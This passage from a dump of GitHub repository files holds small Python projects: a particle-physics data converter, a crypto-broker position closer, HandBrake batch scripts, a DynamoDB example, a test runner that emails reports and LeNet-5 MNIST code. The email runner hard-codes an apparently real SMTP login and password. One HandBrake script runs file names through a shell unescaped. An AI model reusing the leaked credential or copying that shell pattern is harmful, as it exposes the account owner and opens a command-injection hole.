    def iter_dataframes(self, chunksize=100000):\n        curr_event_id = 0\n        curr_impact = 0.0\n        names = ['r0', 'rx', 'ry', 'rz', 'p0', 'px', 'py', 'pz', 'm', 'ityp', '2i3', 'chg', 'lcl#', 'ncl', 'or']\n        for df in pd.read_table(self.data_file, names=names, delim_whitespace=True, chunksize=chunksize):\n            logging.info('Read {} lines from {}.'.format(len(df), self.data_file.name))\n            # -- add additional event_* columns\n            if self.add_event_columns:\n                #total_event_no = len(df[df.r0 == 'UQMD'])\n                df['event_id'] = curr_event_id\n                df['event_ip'] = curr_impact\n                event_start = None\n                for idx in df[df.r0 == 'UQMD'].index:\n                    # remember the index where the event started\n                    if event_start is None:\n                        event_start = idx\n                        continue\n                    curr_impact = df.loc[event_start+3, 'rx']\n                    # set curr_event_id\n                    if self.renumber_event_ids:\n                        curr_event_id += 1\n                    else:\n                        curr_event_id = df.loc[event_start+5, 'rx']\n                    # update event_id and event_ip for the event from event_start (the current event) to idx (the new event)\n                    df.loc[event_start:idx, 'event_ip'] = curr_impact\n                    df.loc[event_start:idx, 'event_id'] = curr_event_id\n                    event_start = idx\n                # update particles belonging to the last event\n                curr_impact = df.loc[event_start+3, 'rx']\n                if self.renumber_event_ids:\n                    curr_event_id += 1\n                else:\n                    curr_event_id = df.loc[event_start + 5, 'rx']\n                df.loc[event_start:, 'event_id'] = curr_event_id\n                df.loc[event_start:, 'event_ip'] = curr_impact\n            # -- end add event_* columns\n            df = df[df['or'].notnull()]\n            df = df.convert_objects(convert_numeric=True)\n            df.dropna(how='any', inplace=True)\n            if self.add_event_columns:\n                df['event_id'] = df['event_id'].astype(np.uint32)\n                df['event_ip'] = df['event_ip'].astype(np.float32)\n            df['r0'] = df['r0'].astype(np.float32)\n            df['rx'] = df['rx'].astype(np.float32)\n            df['ry'] = df['ry'].astype(np.float32)\n            df['rz'] = df['rz'].astype(np.float32)\n            df['p0'] = df['p0'].astype(np.float32)\n            df['px'] = df['px'].astype(np.float32)\n            df['py'] = df['py'].astype(np.float32)\n            df['pz'] = df['pz'].astype(np.float32)\n            df['m'] = df['m'].astype(np.float32)\n            df['ityp'] = df['ityp'].astype(np.int16)\n            df['2i3'] = df['2i3'].astype(np.int8)\n            df['chg'] = df['chg'].astype(np.int8)\n            df['lcl#'] = df['lcl#'].astype(np.uint32)\n            df['ncl'] = df['ncl'].astype(np.uint16)\n            df['or'] = df['or'].astype(np.uint16)\n            yield df\n\n\nclass HDF_Worker(multiprocessing.Process):\n\n    def __init__(self, h5_path, queue):\n        self.h5_path = h5_path\n        self.queue = queue\n        self.block_period = .01\n        super(HDF_Worker, self).__init__()\n\n    def run(self):\n        self.hdf = pd.HDFStore(self.h5_path)\n        original_warnings = list(warnings.filters)\n        warnings.simplefilter('ignore', tables.NaturalNameWarning)\n        while True:\n            try:\n                # get queue content\n                qc = self.queue.get(timeout=self.block_period)\n            except queue.Empty:\n                continue\n            if type(qc) == str and qc == 'EOF': break\n            self.hdf.append('particles', qc, data_columns=True, index=False)\n        self.hdf.close()\n        warnings.filters = original_warnings\n\n\ndef main():\n    parser = argparse.ArgumentParser(description='Convert an UrQMD .f14 file into an HDF5 particle table.')\n    parser.add_argument('urqmd_file', metavar='URQMD_FILE', type=argparse.FileType('r', encoding='ascii'), help=\"Must be of type .f14\")\n    parser.add_argument('out_file', metavar='OUT_FILE', help='The HDF5 (.h5) file to store the information in')\n    parser.add_argument('--no-event-columns', action='store_true', help=\"Do NOT include columns for the event number and event impact parameter.\")\n    parser.add_argument('--chunksize', type=int, default = 100000, help='The number of lines to read in one go.')\n    parser.add_argument('--verbosity', choices=['DEBUG', 'INFO', 'WARNING', 'ERROR'], default='INFO', help=\"How verbose should the output be\")\n    args = parser.parse_args()\n\n    logging.basicConfig(level=args.verbosity, format='%(asctime)s.%(msecs)d %(levelname)s %(message)s', datefmt=\"%Y-%m-%d %H:%M:%S\")\n\n    queue = multiprocessing.Queue()\n    worker = HDF_Worker(args.out_file, queue)\n    worker.start()\n    for df in F14_Reader(args.urqmd_file, not args.no_event_columns).iter_dataframes(chunksize = args.chunksize):\n        logging.debug(\"DataFrame ready to be written to file.\")\n        if not queue.empty(): time.sleep(0.05)\n        logging.debug(\"Queue empty. DataFrame will be put into write queue now.\")\n        queue.put(df.copy())\n    queue.put('EOF')\n    queue.close()\n    queue.join_thread()\n    worker.join()\n\nif __name__ == \"__main__\":\n    main()\n\n"
}
] | 5 |
rube-de/1broker-autoclose | https://github.com/rube-de/1broker-autoclose | b2355bf8bec7beb3d3ed5f02b8ccde2e7e812c4a | 6f67eb9c9421db3f841964b726002f88273e84fc | a7aa62ae27b6d43f1a05233e96d26d93f176b8a7 | refs/heads/master | 2021-07-11T12:03:00.440204 | 2017-10-11T12:37:01 | 2017-10-11T12:37:01 | 105,642,440 | 2 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5567155480384827,
"alphanum_fraction": 0.5660271048545837,
"avg_line_length": 33.06730651855469,
"blob_id": "df9bbe42276b1bc86c01fe08749f16edd19ba763",
"content_id": "a1f7235b41475933cc1553b503bbdcae83c5514b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3551,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 104,
"path": "/auto_sell.py",
"repo_name": "rube-de/1broker-autoclose",
"src_encoding": "UTF-8",
"text": "\nimport sys\nimport logging\n\nimport ccxt\nimport time\nimport datetime\n\n\ndef get_exchange(exchange_id):\n try:\n exchange = getattr(ccxt, exchange_id)({\n 'apiKey': api,\n 'secret': secret,\n 'verbose': False\n })\n except KeyError as e:\n print(\"error: \" + str(e))\n print(\"return exchange without api\")\n exchange = getattr(ccxt, exchange_id)()\n return exchange\n\n\ndef get_trigger_positive(username):\n if username == 'snortex':\n return 200\n elif username == '333':\n return 50\n else:\n return trigger_positive_def\n\n\ndef get_trigger_negative(username):\n if username == 'snortex':\n return -50\n elif username == '333':\n return -10\n else:\n return trigger_negative_def\n\n\n# enter here your api key from 1broker\napi = \"\"\nsecret = \"\"\nexchange_id = \"_1broker\"\n# interval to check the orders in secs\ntime_interval = 60*5\n\n# triggers when to close an order\n# close at +XX%\ntrigger_positive_def = 50\n# close at -XX%\ntrigger_negative_def = -10\n\n# logging file\nlogging.basicConfig(filename=\"1broker_sell.log\", format=\"%(asctime)s %(levelname)s : %(message)s\", level=logging.INFO)\n\nexchange = get_exchange(exchange_id)\n\nwhile True:\n try: \n open_positions = exchange.privateGetPositionOpen()['response'] \n \n curTime = time.time() \n mydate = datetime.datetime.fromtimestamp(curTime) \n mydate = mydate.strftime('%Y%m%d_%H:%M:%S') \n print(\"--- {0:s} ----------------------------------------\".format(mydate)) \n print(\"{1:d} open positions found\".format(mydate, len(open_positions)))\n\n for pos in open_positions:\n pos_id = pos['position_id']\n pos_profit = float(pos['profit_loss'])\n pos_profit_percent = float(pos['profit_loss_percent'])\n pos_stop_loss = float(pos['stop_loss'])\n pos_entry = float(pos['entry_price'])\n\n # for copied trades\n pos_copy = pos['copy_of'] \n if (pos_copy != None) and (int(pos_copy) > 0): \n shared_position = exchange.privateGetPositionSharedGet({'position_id': pos_copy})['response'] \n username = shared_position['username']\n else:\n username = '-- own --'\n pos_copy = str(-1)\n\n # use this for different trader settings \n trigger_positive = get_trigger_positive(username)\n trigger_negative = get_trigger_negative(username)\n\n if pos_profit_percent > 0 and pos_profit_percent > trigger_positive:\n print(\" profit trigger {0:d}% reached, trade closed\".format(trigger_positive))\n logging.info(\"Close position: \" + pos_id + \" (\" + username + \") with profit: \" + str(pos_profit_percent) + \"%\")\n # exchange.privateGetPositionClose({'position_id': pos_id})\n elif pos_profit_percent < 0 and pos_profit_percent < trigger_negative:\n print(\" loss trigger {0:d}% reached, trade closed\".format(trigger_negative))\n logging.info(\"Close position: \" + pos_id + \" (\" + username + \") with loss: \" + str(pos_profit_percent) + \"%\")\n # exchange.privateGetPositionClose({'position_id': pos_id})\n except: \n (type, value, traceback) = sys.exc_info()\n print(\"Exception:\")\n print(type)\n print(value)\n print(traceback)\n print()\n time.sleep(time_interval)\n"
},
{
"alpha_fraction": 0.7455295920372009,
"alphanum_fraction": 0.763411283493042,
"avg_line_length": 32.76744079589844,
"blob_id": "9a10042a88d1094d1778ad4986db5b299d0b10d9",
"content_id": "0afd49eb851180744180a301304a6120bb507109",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1454,
"license_type": "no_license",
"max_line_length": 185,
"num_lines": 43,
"path": "/README.md",
"repo_name": "rube-de/1broker-autoclose",
"src_encoding": "UTF-8",
"text": "# 1broker-autoclose\n\nA little pyhton script to check 1broker with a timed intervall and close positions if they reached a trigger.\n\n## Requirements:\n* Python 3.6\n* ccxt library\n\nCheck what python you have installed with: \n\n`python -V`\n\n=> if it is not Python3.6 => Install Python 3.6 from https://www.python.org/downloads/\n\nAfter that install the ccxt library via pip:\n\n`pip install ccxt` (if you only have one python version installed)\n`pip3.6 install ccxt` (if you have multiple python version installed)\n\n## usage:\nOpen auto_sell.py with an editor/notepad and add your api-key, the timeinterval you want to run the script and the positive and negative triggers. After that you can run the script with\n`python3.6 auto_sell.py`\n\n(the real execution is commented out, if you are satisfied with the actions in the log you have to remove the `#` in the while loop)\n\n\n\n\n## extra:\nThere is also a google script which will check gains.\nYou will need to edit the script to add your api-key as token and have a google sheet named like in the script (my sheet is called BTCBalance)\n\nHint: use triggers in the google script: edit>current project triggers to run the e.g. every working day at 2pm\n\nThe first row on the sheet is:\n\ndate \tbalance \torders_worth \tpositions_worth \tnet_worth\tGain BTC\tGain %\n\n\n\n### if you want to pay me a beer you are free to send some tip here\n* bitcoin: 3NRdkqjeq4DCLeK1B5phfDc996BwHgsAvo\n* dash: Xhheppe83wqdy3fFkMidUXa1CUNp2mEou5\n\n\n"
}
] | 2 |
alexandre-guillaume/scripthandbrake | https://github.com/alexandre-guillaume/scripthandbrake | 20fcf3974c3e1c2bcaec9a86f62cc1e8dcee75c9 | 5fd31aac23944982a0b90c739f2c7365e7dfe6e4 | ed96d65137fb102bc1c264ce49e32dbf7f2fb579 | refs/heads/master | 2021-01-17T06:49:39.424558 | 2018-03-02T19:56:11 | 2018-03-02T19:56:11 | 54,312,990 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7915105819702148,
"alphanum_fraction": 0.8052434325218201,
"avg_line_length": 41.157894134521484,
"blob_id": "8dfd9b0223d0c41568116f575655573a5c6aacd2",
"content_id": "45d3676bee8bd35406206a11cb968fd73dc1bdf5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 801,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 19,
"path": "/README.md",
"repo_name": "alexandre-guillaume/scripthandbrake",
"src_encoding": "UTF-8",
"text": "# scripthandbrake\nthis is a litle python script who check the folder and list file then use handbrakeCLI to convert all video in x265.\n\nuse\non windows (in the folder that contain handbrakeCLI.exe and scripthandbrakev2.py)\npython scripthandbrakev2.py \"path\\directory\"\n(be careful windows don't allow space in path or file)\n\nif you want to change filename use\npython scripthandbrakev2.py \"path\\directory\" \"newFilename\"\n\nif you want to change filename and directory use\npython scripthandbrakev2.py \"path\\directory\" \"newFilename\" \"path\\otherdirectory\"\n\non linux and probably macos\npython ./scripthandbrakev2-linux.py path/directory\n\nthe file scripthanbrakev2.py must be in the directory where HandbrakeCLI is (only for windows), else it will not run \nit work on windows and linux (ubuntu) with python 2.7\n"
},
{
"alpha_fraction": 0.6466302275657654,
"alphanum_fraction": 0.6624165177345276,
"avg_line_length": 31.612245559692383,
"blob_id": "ba2159213e360556fd44ebddff517cac5c1a1ee2",
"content_id": "1e16412ecf32d0308b143c211b86d3b163bfa4b4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1647,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 49,
"path": "/scripthandbrakev2.py",
"repo_name": "alexandre-guillaume/scripthandbrake",
"src_encoding": "UTF-8",
"text": "# -*-coding:Latin-1 -*\r\nimport random\r\nimport os \r\nimport subprocess\r\nimport sys , getopt\r\nfrom os import listdir\r\nfrom os.path import isfile, join\r\n# utilisation python scripthandbrakev2.py \"chemin de fichier\" \r\n# le script va faire un listing des fichier dans le dossier et va convertir les video en x265\r\n\r\n#ATTENTION il ne faut pas d'espace dans le chemin vers les fichier n'y dans les fichier, nulle part\r\n\r\n# https://handbrake.fr/docs/en/latest/cli/cli-guide.html\r\ndef main(argv):\r\n\thandbrakecli = \"HandbrakeCLI.exe\"\r\n#\toption = \" -f mkv -P -e x265 -q 20 -B 160\"\r\n\toption = \" -f mkv -P -e x265 -q 21 -E copy\"\r\n\tinputfile = sys.argv[1]\r\n\tprint 'nombre argument', len(sys.argv)\r\n\toutputfile = inputfile\r\n\tnouveauNom = ''\r\n\tif len(sys.argv) > 3:\r\n\t\toutputfile = sys.argv[3]\r\n\telif len(sys.argv) > 2:\r\n\t\tnouveauNom = sys.argv[2]\r\n\r\n\tindice = 1\r\n\tonlyfiles = [f for f in listdir(inputfile) if isfile(join(inputfile, f))]\r\n\tprint 'liste de fichiers', onlyfiles\r\n\tfor f in onlyfiles:\r\n\t\tcomandein = inputfile + '\\\\' + f\r\n\t\t#test si nouveauNom\r\n\t\tif len(nouveauNom) == 0: \r\n\t\t\tcomandeout = outputfile + '\\\\' + f + '.mkv'\r\n\t\telse:\r\n\t\t\tcomandeout = outputfile + '\\\\' + nouveauNom + '_' + str(indice) + '.mkv'\r\n\t\tcommandeligne = handbrakecli + \" -i \" + comandein + \" -o \" + comandeout + option\r\n\t\t#subprocess.Popen lance les X commande ou a utiliser sur cluster ou cpu avec beaucoup de coeur\r\n\t\t#subprocess.Popen(commandeligne)\r\n\t\tproc = subprocess.Popen(commandeligne)\r\n\t\tproc.wait()\r\n\t\tindice +=1\r\n\t\t#pas de i++ en python\r\n\t\tprint 'un fichier terminer'\r\n\tprint 'terminer'\r\nif __name__ == \"__main__\":\r\n main(sys.argv)\r\n\r\n#os.system(\"pause\")\r\n"
},
{
"alpha_fraction": 0.6726093888282776,
"alphanum_fraction": 0.6896272301673889,
"avg_line_length": 28.35714340209961,
"blob_id": "49cd916f84cdc20c6f87fe0b525afa262fd22060",
"content_id": "824dba5cf82c34c0d3eab8388a641ab610f40b95",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1234,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 42,
"path": "/scripthandbrakev2-linux.py",
"repo_name": "alexandre-guillaume/scripthandbrake",
"src_encoding": "UTF-8",
"text": "# -*-coding:Latin-1 -*\nimport random\nimport os \nimport subprocess\nimport sys , getopt\nfrom os import listdir\nfrom os.path import isfile, join\n# utilisation python scripthandbrakev2.py \"chemin de fichier\" \n# le script va faire un listing des fichier dans le dossier et va convertir les video en x265 \ndef main(argv):\n\thandbrakecli = \"HandBrakeCLI\"\n\toption = \" -f mkv -P -e x265 -q 20 -B 160\"\n\tinputfile = sys.argv[1]\n\n\tprint sys.argv[0]\n\tprint sys.argv[1]\n\n\tprint 'nombre argument', len(sys.argv)\n\tif len(sys.argv) > 2:\n\t\toutputfile = sys.argv[2]\n\telse:\n\t\toutputfile = inputfile\n\n\n\tonlyfiles = [f for f in listdir(inputfile) if isfile(join(inputfile, f))]\n\tprint 'liste de fichiers', onlyfiles\n\tfor f in onlyfiles:\n\t\tcomandein = inputfile + '/' + f \n\t\tcomandeout = outputfile + '/' + f + '.x265' \n\t\tcommandeligne = handbrakecli + \" -i \" + comandein + \" -o \" + comandeout + option\n\t\t#subprocess.Popen lance les X commande ou a utiliser sur cluster ou cpu avec beaucoup de coeur\n\t\t#subprocess.Popen(commandeligne)\n\t\t\n\t\t#subprocess.call([\"ls\", \"-l\"])\n\t\tproc = subprocess.Popen(commandeligne, shell=True)\n\t\tproc.wait()\n\t\tprint 'un fichier terminer'\n\tprint 'terminer'\nif __name__ == \"__main__\":\n main(sys.argv)\n\n#os.system(\"pause\")\n\n"
}
] | 3 |
ErickRosete/dynamodb | https://github.com/ErickRosete/dynamodb | 9031ca8e43a6fb5f1c6680a622aae8e74d09e9d4 | f2b5a8f0b6cfc521aa062dfcce06b2beed01da81 | 093852c7680f2ecf53be819dec03f7748a216d75 | refs/heads/master | 2020-07-27T05:16:05.105260 | 2019-09-16T20:00:47 | 2019-09-16T20:00:47 | 208,881,998 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6516854166984558,
"alphanum_fraction": 0.6516854166984558,
"avg_line_length": 28.33333396911621,
"blob_id": "c5f8fb66304513660719d00765cd4ebf9f828687",
"content_id": "78f004828f290c483f25eadfaa2ff4c1eee17c69",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 89,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 3,
"path": "/setting-env-variables.py",
"repo_name": "ErickRosete/dynamodb",
"src_encoding": "UTF-8",
"text": "import os\nos.environ[\"AWS_ACCESS_KEY_ID\"] = \"\"\nos.environ[\"AWS_SECRET_ACCESS_KEY\"] = \"\"\n\n"
},
{
"alpha_fraction": 0.6792009472846985,
"alphanum_fraction": 0.695652186870575,
"avg_line_length": 27.399999618530273,
"blob_id": "9d500e11a21712cc7cc5b488c4b5e8cda4ba0bad",
"content_id": "e7e12071ab70443f2efc3ce92a562aa6c411abfd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 853,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 30,
"path": "/dynamodb.py",
"repo_name": "ErickRosete/dynamodb",
"src_encoding": "UTF-8",
"text": "import boto3\nfrom datetime import datetime\nfrom decimal import Decimal\nimport json\n\n#EE.UU. Este (Ohio)\tus-east-2\trds.us-east-2.amazonaws.com\tHTTPS\n#EE.UU. Este (Norte de Virginia)\tus-east-1\trds.us-east-1.amazonaws.com\tHTTPS\n#EE.UU. Oeste (Norte de California)\tus-west-1\trds.us-west-1.amazonaws.com\tHTTPS\n#EE.UU. Oeste (Oregón)\tus-west-2\trds.us-west-2.amazonaws.com\tHTTPS\ndynamodb = boto3.resource('dynamodb', region_name ='us-east-2' )\n\ntable = dynamodb.Table('SmartLabs')\nprint(table.creation_date_time)\n\n\nnow = datetime.now()\ntimestamp = str(now)\n#timestamp = datetime.timestamp(now)\n\nitem={\n 'Indice': 1,\n 'Identificación': 'Lab-Rob',\n 'Parameter': 'Humidity',\n 'TimeStamp': timestamp,\n 'Valor': 30\n }\n\nitem_dump = json.dumps(item)\nitem = json.loads(item_dump, parse_float=Decimal)\ntable.put_item(Item = item)"
}
] | 2 |
jiangtian20132045/tt | https://github.com/jiangtian20132045/tt | 7bec1a89ea6d8ac0e9b587490cd4ce3704a807e3 | baa628882c5c6815752dd0cbb4d82f6ec9f3b62f | 38787020bf4b87ff20326aed6cf987ecd79dd2c6 | refs/heads/master | 2020-03-23T09:45:48.549260 | 2018-07-18T09:48:33 | 2018-07-18T09:48:33 | 141,406,693 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5464617013931274,
"alphanum_fraction": 0.5505313277244568,
"avg_line_length": 29.937063217163086,
"blob_id": "64c105277270f6d54378638dec099faabf551a66",
"content_id": "65e5d97933c1ebf88988548b9fb0e2385f155437",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4991,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 143,
"path": "/tt/run_all_case.py",
"repo_name": "jiangtian20132045/tt",
"src_encoding": "UTF-8",
"text": "#coding:utf-8\nimport unittest\nimport os\nfrom report import HTMLTestRunner_TT\nimport smtplib\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nimport time\n\n# base_dir = str(os.path.dirname(os.path.dirname(__file__)))\n# base_dir = str(os.path.dirname(os.path.realpath(__file__)))\n# cur_path = base_dir.replace(\"\\\\\",\"/\")\ncur_path = str(os.path.dirname(os.path.realpath(__file__)))\n# print(base_dir)\nprint(cur_path)\ndef add_case(caseName=\"case\",rule=\"test*.py\"):\n #待执用例的目录\n # case_dir = \"C:\\\\Users\\\\Administrator\\\\PycharmProjects\\\\oldrequest\\\\case\"\n #第一步:加载所有的测试用例\n #用例文件夹\n case_path = os.path.join(cur_path,caseName)\n if not os.path.exists(case_path):\n os.mkdir(case_path)\n print(\"test case path:%s\"%case_path)\n #定义discover方法的参数\n discover = unittest.defaultTestLoader.discover(case_path,\n pattern=\"test*.py\",\n top_level_dir=None)\n print(discover)\n return discover\n\n # case_dir = base_dir+\"/case/\"\n # print(case_dir)\n # testcase = unittest.TestSuite()\n\n # discover = unittest.defaultTestLoader.discover(case_dir,\n # pattern=\"test*.py\",\n # top_level_dir=None)\n\n #discover方法筛选出来的用例,循环添加到测试套件中\n # for test_suite in discover:\n # for test_case in test_suite:\n # #添加用例到testcase\n # testcase.addTests(test_case)\n # print(testcase)\n # return testcase\n\ndef send_email():\n # --1.跟发邮件相关的参数--\n # 发件服务器\n #企业邮箱的服务,如果是个人就用smtp.163.com\n smtpsever = \"smtp.qiye.163.com\"\n # 端口 port\n port = 0\n #账号\n sender = \"[email protected]\"\n #密码\n psw = \"grandstream@jia1\"\n #接收人(多个收件人时采用list对象)\n receiver = [\"[email protected]\",\"[email protected]\"]\n\n #--2.这里是邮件的内容\n\n fire_path = cur_path+\"\\\\report\\\\result.html\"\n with open(fire_path,'rb') as fp:\n mail_body = fp.read()\n # fp.close()\n msg = MIMEMultipart()\n\n subject = \"这个是主题666\"\n msg['form'] = sender\n #多个收件人时,recevier是list,但是这个字典中需要的类型是字符串\n msg['to'] = (\";\").join(receiver)\n print((\";\").join(receiver))\n msg['subject'] = subject\n #定义邮件正文为html格式\n #正文\n body = MIMEText(mail_body,\"html\",\"utf-8\")\n #附件\n att = MIMEText(mail_body,'base64','utf-8')\n att[\"Content-Type\"] = 'application/octet-stream'\n att['Content-Disposition'] = 'attachment;filename=\"result.html\"'\n msg.attach(body)\n msg.attach(att)\n print(\"test email is send\")\n\n#--3.发送邮件\n try:\n smtp = smtplib.SMTP()\n #连接服务器\n smtp.connect(smtpsever)\n #登录\n smtp.login(sender,psw)\n except:\n smtp = smtplib.SMTP_SSL(smtpsever,port)\n smtp.login(sender,psw)\n smtp.sendmail(sender,receiver,msg.as_string())\n smtp.quit()\n\n#生成html报告\ndef run_case(all_case,reportName=\"report\"):\n \"\"\"\"第二步:执行所有的用例,并把结果写入HTML测试报告\"\"\"\n now = time.strftime(\"%Y_%m_%d_%H_%M_%S\")\n #用例文件夹\n report_path = os.path.join(cur_path,reportName)\n #如果不存在就自动创建一个\n if not os.path.exists(report_path):\n os.mkdir(report_path)\n report_abspath = os.path.join(report_path+\"\\\\result.html\")\n print(report_path)\n print(\"report path: %s\"%report_abspath)\n fp = open(report_abspath, \"wb\")\n # runnrer = unittest.TextTestRunner()\n # run所有用例\n runnrer = HTMLTestRunner_TT.HTMLTestRunner(stream=fp,\n title=\"这是我的自动化测试报告\",\n description=\"用例执行情况\",\n TT_name=\"jiangtian\")\n runnrer.run(all_case)\n fp.close()\n\n# def get_report_file(report_file):\n# #获取最新的测试报告\n\nif __name__ == \"__main__\":\n #返回实例\n # report_path = base_dir+\"/result.html\"\n # fp = open(report_path,\"wb\")\n # runnrer = unittest.TextTestRunner()\n #run所有用例\n # runnrer = HTMLTestRunner_TT.HTMLTestRunner(stream=fp,\n # title=\"这是我的自动化测试报告\",\n 
# description=\"用例执行情况\",\n # TT_name=\"jiangtian\")\n # runnrer.run(add_case())\n # fp.close()\n #加载用例\n all_case = add_case()\n #执行用例\n run_case(all_case)\n #获取最新生成的测试报告文件\n report_path = os.path.join(cur_path,\"report\")\n send_email()"
},
{
"alpha_fraction": 0.694915235042572,
"alphanum_fraction": 0.6991525292396545,
"avg_line_length": 21.4761905670166,
"blob_id": "606beeada81403e87d4d5acfee7f147ce2879765",
"content_id": "988b08a78575dd06b14d198fd4e4301ae3a97f19",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 518,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 21,
"path": "/tt/case/test_03.py",
"repo_name": "jiangtian20132045/tt",
"src_encoding": "UTF-8",
"text": "#coding:utf-8\nfrom bs4 import BeautifulSoup\nimport requests\n\n# r = requests.get(\"http://www.cnblogs.com/yoyoketang\")\n# #请求后获取整个页面\n# result = r.content\n# print(result)\n#\n# #用html.parser解析html\n# soup = BeautifulSoup(result,\"html.parser\")\n#\n# #获取所有的class属性为dayTitle,返回tag类\n# times = soup.find_all(class_=\"dayTitle\")\n# for i in times:\n# a = i\n# print(i.a.string)\n\nyoyo = open(\"tt.html\",encoding='gbk',errors='ignore')\nsoup = BeautifulSoup(yoyo)\nprint(soup.prettify())\n"
}
] | 2 |
himvish997/tensorflow-tutorial | https://github.com/himvish997/tensorflow-tutorial | 21330201108b3b2b99c0eab36877a5788c57dcf7 | dda78dfb8837a2f636abb785b3785678e909f21b | 30f71675b07d4d00d2045f86ecf21d32065f991f | refs/heads/master | 2020-05-21T01:02:36.453381 | 2019-06-02T13:52:55 | 2019-06-02T13:52:55 | 185,845,532 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6186291575431824,
"alphanum_fraction": 0.6590509414672852,
"avg_line_length": 38.27586364746094,
"blob_id": "eabfe651e0f4f7002586c08a577b1f628b6a6ed8",
"content_id": "a8e0dc43bce26babffbab74ebbb5c3e11f3d1fb3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1140,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 29,
"path": "/LeNet-5/download_data.py",
"repo_name": "himvish997/tensorflow-tutorial",
"src_encoding": "UTF-8",
"text": "# LeNet-5 Model\n# filename: download_data.py\n'''Let’s import the MNIST data from the tensorflow library. The MNIST database\ncontains 60,000 training images and 10,000 testing images. Each image is of\nsize 28*28*1. We need to resize it to 32*32*1 for the LeNet-5 Model.'''\n\nimport numpy as np\nfrom tensorflow.examples.tutorials.mnist import input_data\n\n\ndef train_data():\n mnist = input_data.read_data_sets(\"MNIST_data/\", reshape=False, one_hot = True)\n X_train, y_train = mnist.train.images, mnist.train.labels\n X_train = np.pad(X_train, ((0,0), (2,2), (2,2), (0,0)), 'constant')\n return X_train, y_train\n\n\ndef val_data():\n mnist = input_data.read_data_sets(\"MNIST_data/\", reshape=False, one_hot = True)\n X_val, y_val = mnist.validation.images, mnist.validation.labels\n X_val = np.pad(X_val, ((0,0), (2,2), (2,2), (0,0)), 'constant')\n return X_val, y_val\n\n\ndef test_data():\n mnist = input_data.read_data_sets(\"MNIST_data/\", reshape=False, one_hot = True)\n X_test, y_test = mnist.test.images, mnist.test.labels\n X_test = np.pad(X_test, ((0,0), (2,2), (2,2), (0,0)), 'constant')\n return X_test, y_test"
},
{
"alpha_fraction": 0.6223359107971191,
"alphanum_fraction": 0.6285876631736755,
"avg_line_length": 41.409637451171875,
"blob_id": "5b8b4fb255b4f1be1481b42805fe37036e13b848",
"content_id": "71b0b07f6db42c70e7c79775c9d1e992c2e07457",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3519,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 83,
"path": "/LeNet-5/Feedable_iterator.py",
"repo_name": "himvish997/tensorflow-tutorial",
"src_encoding": "UTF-8",
"text": "# LeNet-5 Model\n# filename: Feedable_iterator.py\n\nimport tensorflow as tf\nimport numpy as np\nfrom model import model\n\n# Feedable iterator\n'''This iterator provides the option of switching between various iterators. \nWe can create a re-initializable iterator for training and validation purposes. \nFor inference/testing where you require one pass of the dataset, We can use \nthe one shot iterator.'''\n\ndef Feedable_iterator(X_train, y_train, X_val, y_val, X_test, y_test):\n epochs = 10\n batch_size = 64\n\n tf.reset_default_graph()\n\n X_data = tf.placeholder(tf.float32, [None, 32, 32, 1])\n Y_data = tf.placeholder(tf.float32, [None, 10])\n\n train_dataset = tf.data.Dataset.from_tensor_slices((X_data, Y_data)).batch(batch_size)\n val_dataset = tf.data.Dataset.from_tensor_slices((X_data, Y_data)).batch(batch_size)\n\n test_dataset = tf.data.Dataset.from_tensor_slices((X_test, y_test.astype(np.float32))).batch(batch_size)\n\n handle = tf.placeholder(tf.string, shape=[])\n iterator = tf.data.Iterator.from_string_handle(handle, train_dataset.output_types, train_dataset.output_shapes)\n X_batch, Y_batch = iterator.get_next()\n (learner, accuracy) = model(X_batch, Y_batch)\n\n train_val_iterator = tf.data.Iterator.from_structure(train_dataset.output_types, train_dataset.output_shapes)\n train_iterator = train_val_iterator.make_initializer(train_dataset)\n val_iterator = train_val_iterator.make_initializer(val_dataset)\n\n test_iterator = test_dataset.make_one_shot_iterator()\n\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n train_val_string_handle = sess.run(train_val_iterator.string_handle())\n test_string_handle = sess.run(test_iterator.string_handle())\n for epoch in range(epochs):\n\n # train the model\n sess.run(train_iterator, feed_dict={X_data: X_train, Y_data: y_train})\n total_train_accuracy = 0\n no_train_examples = len(y_train)\n try:\n while True:\n temp_train_accuracy, _ = sess.run([accuracy, learner], feed_dict={handle: train_val_string_handle})\n total_train_accuracy += temp_train_accuracy * batch_size\n except tf.errors.OutOfRangeError:\n pass\n\n # validate the model\n sess.run(val_iterator, feed_dict={X_data: X_val, Y_data: y_val})\n total_val_accuracy = 0\n no_val_examples = len(y_val)\n try:\n while True:\n temp_val_accuracy = sess.run(accuracy, feed_dict={handle: train_val_string_handle})\n total_val_accuracy += temp_val_accuracy * batch_size\n except 